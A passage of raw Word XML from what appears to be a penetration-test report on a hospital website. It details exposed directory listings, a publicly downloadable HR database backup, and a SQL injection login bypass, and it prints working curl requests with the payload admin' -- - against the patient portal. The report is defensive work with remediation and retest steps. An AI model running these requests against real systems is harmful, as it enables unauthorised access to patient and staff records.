        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>/old/ directory listing exposed mediroza_db_backup_2019.sql.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>/patient/ directory listing exposed reports/, download.php, error_log, login.php, logout.php and portal.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>/staff/ directory listing exposed login.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>/patient/reports/ returned 403 when browsed directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="2490679"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="10_Old_Directory_Index.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2490679"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: /old/ directory listing and exposed backup filename.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="3002781"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="11_Patient_Directory_Index.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="3002781"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: /patient/ directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="2985323"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="24_Staff_Directory_Index.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2985323"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: /staff/ directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Public enumeration of application files, logs, report paths and backup names.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In this assessment, /old/, /patient/ and /staff/ exposed directory listings. The listing under /old/ was particularly consequential because it revealed a backup filename that could then be requested directly. The /patient/ listing exposed download.php, portal.php, login.php, logout.php and an error_log file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Disable auto-indexing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>remove sensitive material from the web root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>deny direct access to backup/archive/log extensions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>deploy a default-deny rule for legacy directories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>retest known and guessed filenames.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Unauthenticated requests to /old/, /patient/ and /staff/ must not return directory listings; known backup/log filenames must return 403/404.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>F-02 — Unauthenticated internal HR database backup exposure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CRITICALITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS v3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FEE2E2"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9.4*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-552</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The file mediroza_db_backup_2019.sql was directly retrievable from /old/. Its header identifies a Mediroza CMS 1.4.2 backup for the mediroza_hr database and explicitly warns that it contains confidential staff and shareholder records. The captured SQL contains 30 staff rows and 10 shareholder rows. Staff fields include full name, job title, department, email, phone, national ID, monthly salary and joining date. Shareholder fields include name, ownership percentage, shares held and share class.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This is a direct unauthenticated disclosure of internal corporate and personal data. The finding is independent of the patient login SQL injection; an attacker can obtain the backup without first authenticating. The data is structured and immediately machine-readable, which materially increases its usefulness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Unauthenticated GET retrieved the SQL backup successfully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Backup size: approximately 6.2 KB; 93 lines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Staff table: 30 records.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Shareholders table: 10 records.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Exact monthly payroll derived from the captured salary values: ZAR 2,027,000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Minimum salary: ZAR 19,000; maximum: ZAR 160,000; average: ZAR 67,566.67.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="3052007"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="06_Public_SQL_Backup.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3052007"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: browser-rendered internal SQL backup and confidentiality warning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Direct disclosure of 30 staff records and 10 shareholder records.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Its header identifies a Mediroza CMS 1.4.2 backup for the mediroza_hr database and explicitly warns that it contains confidential staff and shareholder records. The captured SQL contains 30 staff rows and 10 shareholder rows. Staff fields include full name, job title, department, email, phone, national ID, monthly salary and joining date. Shareholder fields include name, ownership percentage, shares held and share class.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Remove the backup from the public web root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>rotate or delete exposed copies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>block backup/archive extensions at the web-server layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>store backups outside the document root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>enforce authenticated, audited backup retrieval</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>search the deployment for additional copies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The known backup URL and common backup extensions must be inaccessible without authenticated administrative authorization; no confidential data may be returned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>F-03 — SQL injection enabling patient-portal authentication bypass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CRITICALITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS v3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FEE2E2"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The patient login endpoint accepted username and password via POST. A baseline invalid credential request returned HTTP 200 with a 2,281-byte response and no redirect. Changing only the username to the controlled value admin' -- - changed the result to HTTP 302 with a Location header pointing to /patient/portal.php. Browser evidence then showed the authenticated patient portal. This differential behavior is the central manual proof.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The application appears to be allowing attacker-controlled syntax to alter the database query used for authentication. The exact unseen source-code statement is not claimed; the evidence supports insufficient query parameterization/input handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Baseline request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="259" w:right="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>curl -k -sS -o /tmp/a.html -w "status=%{http_code} size=%{size_download} redirect=%{redirect_url}\n" -X POST "https://medirozahospital.com/patient/login.php" --data-urlencode "username=admin" --data-urlencode "password=wrongpassword123"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Observed baseline: status=200, size=2281, redirect empty.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Controlled exploit request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="259" w:right="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>curl -k -sS -o /tmp/b.html -w "status=%{http_code} size=%{size_download} redirect=%{redirect_url}\n" -X POST "https://medirozahospital.com/patient/login.php" --data-urlencode "username=admin' -- -" --data-urlencode "password=wrongpassword123"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Observed exploit: status=302, redirect=https://medirozahospital.com/patient/portal.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The decisive property is the state transition. The password remained the same invalid value in both requests; the username field was the only changed control. The resulting authenticated portal was confirmed in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="2973684"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="13_Patient_Login_Form.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2973684"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: patient login form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="3133716"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="03_SQLi_Test_Request.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="3133716"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: controlled SQLi request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="1882557"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="04_SQLi_Auth_Bypass_Response.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="1882557"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: HTTP 302 response after controlled input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5577840" cy="3133716"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
